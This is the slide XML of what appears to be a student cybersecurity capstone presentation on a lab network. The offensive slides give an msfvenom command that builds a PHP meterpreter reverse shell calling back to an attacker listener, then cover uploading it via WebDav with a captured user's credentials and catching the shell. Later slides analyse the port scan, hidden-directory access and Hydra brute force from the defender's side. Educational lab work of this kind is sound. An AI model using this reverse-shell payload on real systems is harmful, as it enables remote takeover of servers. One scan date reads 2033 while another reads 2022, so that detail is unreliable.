          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="410125" y="1541425"/>
            <a:ext cx="3735776" cy="2207350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4274125" y="1379425"/>
            <a:ext cx="4025900" cy="22726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8" name="Shape 1168"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p6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Remote Code Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Google Shape;1170;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91077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14</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p66"/>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6"/>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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created and uploaded payload:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=55555 &gt;&gt; shell1.php</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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Established remote listener.  Executed reverse shell backdoor on Capstone Apache server.</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73" name="Google Shape;1173;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1174" name="Google Shape;1174;p66"/>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75" name="Google Shape;1175;p66"/>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 name="Google Shape;1176;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1177" name="Google Shape;1177;p66"/>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78" name="Google Shape;1178;p66"/>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9" name="Google Shape;1179;p66"/>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6"/>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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created a reverse shell payload and moved it to WebDav server as Ryan</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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Listen to the host and port</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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Once the payload is executed, the attacker can listen to the Capstone server (192.168.1.105)</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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Flag file was discovered: </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;result of cat&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>b1ng0w@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1182" name="Google Shape;1182;p66"/>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83" name="Google Shape;1183;p66"/>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84" name="Google Shape;1184;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267825" y="1381650"/>
            <a:ext cx="2684625" cy="762825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1185" name="Google Shape;1185;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4010775" y="4401950"/>
            <a:ext cx="2066950" cy="458250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267825" y="2200913"/>
            <a:ext cx="2587275" cy="2659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6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Exploitation: Local File Inclusion (LFI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2021-31783</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Google Shape;1192;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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15</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="781275" y="1480575"/>
            <a:ext cx="2371500" cy="1357200"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 1382"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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="2371500" cy="12765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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used msfvenom and meterpreter to deliver a payload onto the vulnerable machine (the capstone server)</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95" name="Google Shape;1195;p67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1196" name="Google Shape;1196;p6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97" name="Google Shape;1197;p6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67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="2975928"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1199" name="Google Shape;1199;p67"/>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00" name="Google Shape;1200;p67"/>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1" name="Google Shape;1201;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="781275" y="3503050"/>
            <a:ext cx="2428500" cy="1357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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781275" y="3503050"/>
            <a:ext cx="2428500" cy="14136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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Using the multi/handler exploit I could get access to the machine’s shell.</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100">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3266400" y="887900"/>
            <a:ext cx="3457226" cy="37832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pic>
        <p:nvPicPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p68"/>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09" name="Google Shape;1209;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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210" name="Google Shape;1210;p6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6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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="675975"/>
            <a:ext cx="8409300" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>The port (192.168.1.90) scan occurred on April 23, 2033 @ 13:27 or 1:27 pm EST.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>The majority of the HTTP responses sent from the target (victim) machine to the attacking machine are 404s (could not find) at a count of 5,000+. The second amount of HTTP responses sent from the targeting (victim) machine to the attacking machine is 200 (OK) at a count of 500. The third most HTTP response sent was 400 (bad request code).</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>POST request sent from the Kali to capstone machine they are using kali.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Multiple ports requested at the same time are indicative of a port scan</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:schemeClr val="accent6"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="883512"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="342912" y="2021325"/>
            <a:ext cx="8458176" cy="2712175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1220" name="Google Shape;1220;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="495312" y="2173725"/>
            <a:ext cx="8458176" cy="2712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7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226" name="Google Shape;1226;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="9107700" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="8686800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>19</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Google Shape;1227;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="773550"/>
            <a:ext cx="8409300" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>The request for the hidden directory occurred on April 23, 2022 at 11:38am.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>There were 4 requests made to the hidden directory /company_folders/secret_folder from the IP address 192.168.1.90.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>The “secret_folder” contained a hash password for the employee’s credentials (Ryan), which can be used for uploading a payload, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>exploiting other vulnerabilities.  The “connect_to_corp_server” file was requested, which contains instructions for connecting to WebDav</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="875437"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1745250"/>
            <a:ext cx="7410451" cy="2339251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220924" y="3467049"/>
            <a:ext cx="3671006" cy="1013100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="582625" y="3487750"/>
            <a:ext cx="4571625" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695450" y="4341200"/>
            <a:ext cx="5581650" cy="542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7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238" name="Google Shape;1238;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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20</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="741300"/>
            <a:ext cx="8409300" cy="9717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There were 17,047 packet requests made by a brute force attack (Hydra)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>2 attacks were successful.  The HTTP response code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t> 200 indicates a successful discovery of the correct password and was redirected to another web page.</a:t>
            </a:r>
